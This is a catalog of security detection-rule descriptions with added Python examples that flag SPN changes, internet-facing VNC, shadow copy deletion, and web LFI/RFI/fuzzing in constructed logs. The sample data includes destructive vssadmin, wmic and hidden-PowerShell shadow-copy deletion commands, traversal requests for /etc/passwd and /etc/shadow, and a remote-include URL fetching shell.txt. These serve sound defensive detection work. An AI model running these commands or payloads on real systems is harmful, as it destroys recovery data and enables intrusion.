EXPLORE DETECTIONS
User account exposed to Kerberoasting
Detects when a user account has its servicePrincipalName attribute modified. An attacker with write privileges over a user object can configure Service Principal Names (SPNs) on it, which makes a service ticket for that account requestable and therefore allows Kerberoasting. Administrators also set SPNs for legitimate purposes, which exposes the account to Kerberoasting just the same, so the detection flags the exposure rather than proving malicious intent.
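As an added example (not the rule's own query), the following Python shows the decision the description implies: a servicePrincipalName value being added, on a user-class object, as opposed to a computer object or an SPN removal. It assumes the telemetry is Windows Security event 5136 (Directory Service Changes), which requires the "Audit Directory Service Changes" subcategory and an audit SACL on the objects; the field names follow that event, and the sample events are constructed.

```python
"""Flag servicePrincipalName additions on user objects.

Added example, not the rule's own query. Assumes the telemetry is Windows Security
event 5136 (Directory Service Changes), whose fields include ObjectClass,
AttributeLDAPDisplayName, AttributeValue and OperationType, where OperationType
%%14674 is "value added" and %%14675 is "value deleted". The events below are
constructed for this example.
"""
from typing import Dict, List, Tuple

VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # SPN added to an ordinary user: exactly the exposure the rule looks for.
        "EventID": "5136", "SubjectUserName": "jdoe",
        "ObjectDN": "CN=svc-reports,OU=Service Accounts,DC=corp,DC=local",
        "ObjectClass": "user", "AttributeLDAPDisplayName": "servicePrincipalName",
        "AttributeValue": "HTTP/reports.corp.local", "OperationType": VALUE_ADDED,
    },
    {  # SPN added to a computer object: routine, every machine account carries SPNs.
        "EventID": "5136", "SubjectUserName": "WS01$",
        "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=local",
        "ObjectClass": "computer", "AttributeLDAPDisplayName": "servicePrincipalName",
        "AttributeValue": "HOST/WS01.corp.local", "OperationType": VALUE_ADDED,
    },
    {  # SPN removed from a user: reduces exposure, so not a hit.
        "EventID": "5136", "SubjectUserName": "admin",
        "ObjectDN": "CN=svc-old,OU=Service Accounts,DC=corp,DC=local",
        "ObjectClass": "user", "AttributeLDAPDisplayName": "servicePrincipalName",
        "AttributeValue": "MSSQLSvc/db01.corp.local:1433", "OperationType": VALUE_DELETED,
    },
    {  # Unrelated attribute change on a user.
        "EventID": "5136", "SubjectUserName": "admin",
        "ObjectDN": "CN=jsmith,OU=Users,DC=corp,DC=local",
        "ObjectClass": "user", "AttributeLDAPDisplayName": "description",
        "AttributeValue": "Finance", "OperationType": VALUE_ADDED,
    },
]


def spn_added_to_user(event: Dict[str, str]) -> bool:
    """True when a 5136 event records an SPN value being added to a user-class object."""
    return (
        event.get("EventID") == "5136"
        and event.get("ObjectClass", "").lower() == "user"
        and event.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
        and event.get("OperationType") == VALUE_ADDED
    )


def find_kerberoastable_exposures(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (actor, target DN, SPN) for every SPN added to a user object.

    Computer objects are ignored (SPNs are normal there) and deletions are ignored
    because removing an SPN makes the account less roastable, not more.
    """
    return [
        (e["SubjectUserName"], e["ObjectDN"], e["AttributeValue"])
        for e in events
        if spn_added_to_user(e)
    ]


if __name__ == "__main__":
    for actor, dn, spn in find_kerberoastable_exposures(SAMPLE_EVENTS):
        print(f"{actor} set SPN {spn} on {dn}")
```

Triage then turns on the actor and the target: an SPN set by a known service-account owner during a change window is the legitimate case the description mentions, while an SPN set by an ordinary user on an account they merely have write access to is the abuse case. Either way the account is now Kerberoastable until the SPN is removed or its password is made long and random.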
User Added to Privileged Group in Active Directory
Identifies a user being added to a privileged group in Active Directory. Privileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems.
User Added to the Admin Group
Identifies users being added to the admin group. This could be an indication of privilege escalation activity.
User Detected with Suspicious Windows Process(es)
A machine learning job combination has identified a user with one or more suspicious Windows processes that exhibit unusually high malicious probability scores. These processes were classified as malicious in several ways: each was predicted to be malicious by the ProblemChild supervised ML model, and, where the anomaly contains a cluster of suspicious processes, every process in the cluster runs under the same user name and the aggregate score of the cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLBins, that may be resistant to detection using conventional search rules.
User or Group Creation/Modification
This rule leverages the "auditd_manager" integration to detect user or group creation or modification events on Linux systems. Threat actors may attempt to create or modify users or groups to establish persistence on the system.
Veeam Backup Library Loaded by Unusual Process
Identifies potential credential decryption operations by PowerShell or unsigned processes that load the Veeam.Backup.Common.dll library. Attackers can use recovered Veeam credentials to target backups as part of destructive operations such as ransomware attacks.
Virtual Machine Fingerprinting
An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.
Virtual Machine Fingerprinting via Grep
An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies grep being run by a non-root user against common locations that reveal virtual machine hardware. This technique has been used by the Pupy RAT and other malware.
Virtual Private Network Connection Attempt
Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN). Adversaries may use VPN connections to laterally move and control remote systems on a network.
VNC (Virtual Network Computing) from the Internet
This rule detects network events that may indicate the use of VNC traffic from the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector.
VNC (Virtual Network Computing) to the Internet
This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector.
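The two VNC rules above differ only in which side of the connection is on the Internet. The following added example (not the rules' own query) shows that classification over constructed flow records. It assumes VNC on TCP 5800-5810 (browser/Java viewer) and 5900-5910 (RFB displays :0 to :10) and lists the internal address blocks explicitly instead of relying on ipaddress.is_private, which omits the shared address space 100.64.0.0/10 that many networks use internally and treats the documentation ranges such as 203.0.113.0/24 as private.

```python
"""Classify VNC flows as 'from the Internet', 'to the Internet' or internal.

Added example, not the rules' own query. Assumes VNC ports 5800-5810 and 5900-5910
and an explicit list of internal address blocks (see module notes on is_private).
The flows below are constructed for this example.
"""
import ipaddress
from typing import List, Optional, Tuple

VNC_PORTS = set(range(5800, 5811)) | set(range(5900, 5911))

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "100.64.0.0/10",                                  # RFC 6598 shared address space (CGNAT/overlays)
    "127.0.0.0/8", "169.254.0.0/16",                  # loopback, link-local
    "fc00::/7", "fe80::/10", "::1/128",               # IPv6 ULA, link-local, loopback
)]

RULES_OF_INTEREST = ("vnc_from_internet", "vnc_to_internet")


def is_internal(addr: str) -> bool:
    """Membership in the explicit internal list; a v4 address never matches a v6 net."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify_vnc_flow(src_ip: str, dst_ip: str, dst_port: int) -> Optional[str]:
    """Return the rule a flow would trigger, 'vnc_internal' for in-network use, or None."""
    if dst_port not in VNC_PORTS:
        return None
    src_in, dst_in = is_internal(src_ip), is_internal(dst_ip)
    if dst_in and not src_in:
        return "vnc_from_internet"
    if src_in and not dst_in:
        return "vnc_to_internet"
    return "vnc_internal"  # both sides internal (or both external, as a proxy sensor might see)


SAMPLE_FLOWS: List[Tuple[str, str, int]] = [
    ("198.51.100.23", "10.0.5.14", 5900),   # external source into an internal desktop
    ("10.0.5.14", "203.0.113.77", 5901),    # internal host reaching an external display :1
    ("10.0.5.14", "10.0.7.2", 5900),        # admin to admin inside the network
    ("100.64.3.9", "10.0.5.14", 5800),      # CGNAT/overlay source counts as internal here
    ("10.0.5.14", "203.0.113.77", 443),     # not a VNC port
    ("2001:db8::10", "fd00::5", 5900),      # IPv6 documentation prefix (external) into a ULA host
]


def detect_internet_vnc(flows: List[Tuple[str, str, int]]) -> List[Tuple[str, str, int, str]]:
    """Flows that would fire either Internet-facing VNC rule, with the rule name."""
    hits = []
    for src, dst, port in flows:
        verdict = classify_vnc_flow(src, dst, port)
        if verdict in RULES_OF_INTEREST:
            hits.append((src, dst, port, verdict))
    return hits


if __name__ == "__main__":
    for hit in detect_internet_vnc(SAMPLE_FLOWS):
        print(hit)
```

The fourth flow is the one worth noticing: with is_private alone, 100.64.3.9 would be treated as external and the flow would fire "from the Internet" even though it came from the organisation's own overlay. Conversely, the 203.0.113.x destinations would be treated as private and the "to the Internet" case would be missed. Whatever list a sensor uses, it should be the network's actual internal ranges rather than a library default.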
Volume Shadow Copy Deleted or Resized via VssAdmin
Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.
Volume Shadow Copy Deletion via PowerShell
Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks.
Volume Shadow Copy Deletion via WMIC
Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.
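The three shadow-copy rules above cover three ways of reaching the same outcome. As an added example (not the rules' own queries), the following Python matches constructed process-creation events against the vssadmin, wmic and PowerShell/Win32_ShadowCopy command lines those rules describe, and keeps the parent process for triage, since backup software also resizes shadow storage legitimately.

```python
"""Match process command lines against the three shadow-copy destruction paths.

Added example, not the rules' own queries. The regexes are case-insensitive and
tolerate extra arguments between tokens; the process events are constructed.
"""
import re
from typing import Dict, List, Tuple

TECHNIQUES = [
    # vssadmin: deletion, or resizing shadow storage so existing copies are purged.
    ("vssadmin_delete_or_resize",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\b(?:delete\s+shadows|resize\s+shadowstorage)\b", re.I | re.S)),
    # wmic: the shadowcopy alias with a delete verb anywhere after it.
    ("wmic_shadowcopy_delete",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I | re.S)),
    # PowerShell: Win32_ShadowCopy instances deleted via the WMI method or removal cmdlets.
    ("powershell_win32_shadowcopy_delete",
     re.compile(r"win32_shadowcopy.*(?:\.delete\s*\(|remove-wmiobject|remove-ciminstance)", re.I | re.S)),
]

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"process": "vssadmin.exe", "parent": "cmd.exe",
     "command_line": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"process": "vssadmin.exe", "parent": "BackupAgent.exe",   # legitimate-looking parent, still a hit
     "command_line": "vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=401MB"},
    {"process": "vssadmin.exe", "parent": "cmd.exe",           # read-only enumeration, not a hit
     "command_line": "vssadmin.exe List Shadows"},
    {"process": "wmic.exe", "parent": "cmd.exe",
     "command_line": "wmic.exe shadowcopy delete /nointeractive"},
    {"process": "powershell.exe", "parent": "winword.exe",
     "command_line": 'powershell.exe -nop -w hidden -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"'},
    {"process": "powershell.exe", "parent": "explorer.exe",
     "command_line": 'powershell.exe -c "Get-CimInstance Win32_ShadowCopy | Remove-CimInstance"'},
    {"process": "powershell.exe", "parent": "explorer.exe",    # listing only, not a hit
     "command_line": 'powershell.exe -c "Get-CimInstance Win32_ShadowCopy | Format-List"'},
]


def match_shadow_copy_destruction(command_line: str) -> List[str]:
    """Names of the techniques whose pattern matches this command line."""
    return [name for name, rx in TECHNIQUES if rx.search(command_line)]


def detect_shadow_copy_destruction(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(technique, parent process, command line) for every matching event."""
    hits = []
    for e in events:
        for technique in match_shadow_copy_destruction(e["command_line"]):
            hits.append((technique, e["parent"], e["command_line"]))
    return hits


if __name__ == "__main__":
    for technique, parent, cmd in detect_shadow_copy_destruction(SAMPLE_EVENTS):
        print(f"{technique:36} parent={parent:16} {cmd}")
```

The resize case is the one that needs the parent: a backup agent shrinking shadow storage on a schedule is routine, while the same command spawned from cmd.exe or an Office process alongside a deletion is the ransomware pattern the rule descriptions refer to.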
WDAC Policy File by an Unusual Process
Identifies the creation of a Windows Defender Application Control (WDAC) policy file by an unusual process. Adversaries may use a specially crafted WDAC policy to restrict the execution of security products.
Web Application Suspicious Activity: POST Request Declined
A POST request to a web application returned a 403 response, which indicates the web application declined to process the request because the action requested was not allowed.
Web Application Suspicious Activity: sqlmap User Agent
This is an example of how to detect an unwanted web client user agent. This search matches the user agent for sqlmap 1.3.11, which is a popular FOSS tool for testing web applications for SQL injection vulnerabilities.
Web Application Suspicious Activity: Unauthorized Method
A request to a web application returned a 405 response, which indicates the web application declined to process the request because the HTTP method is not allowed for the resource.
Web Server Discovery or Fuzzing Activity
This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks.
Web Server Exploitation Detected via Defend for Containers
This rule detects the exploitation of a web server through the execution of a suspicious process by common web server user accounts. Attackers may upload a web shell to a web server to maintain access to the system.
Web Server Local File Inclusion Activity
This rule detects potential Local File Inclusion (LFI) activity on web servers by identifying HTTP GET requests that attempt to access sensitive local files through directory traversal techniques or known file paths. Attackers may exploit LFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
Web Server Potential Command Injection Request
This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early.
Web Server Potential Remote File Inclusion Activity
This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests whose parameters point the application at a file on a remote host, for example a value beginning with http://, https:// or ftp://. Attackers may exploit RFI vulnerabilities to have the server fetch and execute attacker-controlled code, read sensitive data, or further compromise the system.
Web Server Potential Spike in Error Response Codes
This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited.
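The web-server rules above for discovery or fuzzing, Local File Inclusion and Remote File Inclusion share one ingredient: parsing the access log and normalising the request URL before matching. The following added example (not the rules' own queries) runs all three checks over constructed Apache/nginx combined-format log lines. The window and threshold (five GET 403/404 responses from one address within 60 seconds), the traversal and sensitive-file indicators and the remote schemes are illustrative assumptions, not the rules' real values.

```python
"""Access-log detections for discovery/fuzzing, LFI and RFI indicators.

Added example, not the rules' own queries. Assumes Apache/nginx combined log format.
The window/threshold, the indicator lists and the sample log lines are constructed
for this example and are illustrative, not the rules' real values.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "win.ini", "boot.ini")
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line: str) -> Optional[Dict]:
    """Combined-format line to a record with a parsed timestamp and integer status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def decode_url(url: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e%252f) is seen as ../"""
    for _ in range(rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def lfi_indicators(url: str) -> List[str]:
    """Traversal sequences or well-known sensitive paths anywhere in the decoded URL."""
    d = decode_url(url).lower()
    hits = ["directory_traversal"] if TRAVERSAL.search(d) else []
    return hits + [f"sensitive_file:{f}" for f in SENSITIVE_FILES if f in d]


def rfi_indicators(url: str) -> List[str]:
    """Query parameters whose decoded value is a URL on another host."""
    return [f"remote_include:{k}" for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if decode_url(v).lower().startswith(REMOTE_SCHEMES)]


def fuzzing_sources(records: List[Dict], window_s: int = 60, threshold: int = 5) -> Dict[str, int]:
    """Source IPs with >= threshold GET 403/404 responses inside any window_s span."""
    by_ip = defaultdict(list)
    for r in records:
        if r["method"] == "GET" and r["status"] in (403, 404):
            by_ip[r["ip"]].append(r["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):            # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def analyze(lines: List[str]) -> Dict[str, object]:
    records = [r for r in map(parse_line, lines) if r]
    findings = {"fuzzing": fuzzing_sources(records), "lfi": [], "rfi": []}
    for r in records:
        findings["lfi"] += [(r["ip"], r["url"], h) for h in lfi_indicators(r["url"])]
        findings["rfi"] += [(r["ip"], r["url"], h) for h in rfi_indicators(r["url"])]
    return findings


def _line(ip, ts, path, status, method="GET"):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


SAMPLE_LOG = [
    # Constructed: a scanner walking common paths, eight 404s from one source in 30 seconds.
    *[_line("198.51.100.7", f"10/Oct/2024:13:55:{s:02d} +0000", p, 404) for s, p in zip(
        range(0, 32, 4), ("/admin", "/backup.zip", "/.git/config", "/phpmyadmin/",
                          "/.env", "/wp-login.php", "/config.php.bak", "/server-status"))],
    _line("203.0.113.5", "10/Oct/2024:13:56:01 +0000", "/index.php?page=..%2F..%2F..%2Fetc%2Fpasswd", 200),
    _line("203.0.113.5", "10/Oct/2024:13:56:03 +0000", "/view?file=%252e%252e%252f%252e%252e%252fetc%252fshadow", 500),
    _line("203.0.113.9", "10/Oct/2024:13:56:10 +0000", "/index.php?inc=http%3A%2F%2F203.0.113.99%2Fshell.txt", 200),
    _line("192.0.2.44", "10/Oct/2024:13:56:12 +0000", "/products?id=42", 200),
    _line("192.0.2.44", "10/Oct/2024:13:56:15 +0000", "/search?q=http+status+codes", 200),
]

if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_LOG).items():
        print(kind, hits)
```

Two details matter in practice. Decoding must happen before matching, and more than once, or the double-encoded request in the second LFI line sails past a check for "../". And the fuzzing count uses a sliding window over sorted timestamps rather than fixed one-minute buckets, so a burst straddling a minute boundary is not split in half; including 403 alongside 404 means scans blocked by a WAF or access control still count toward the threshold.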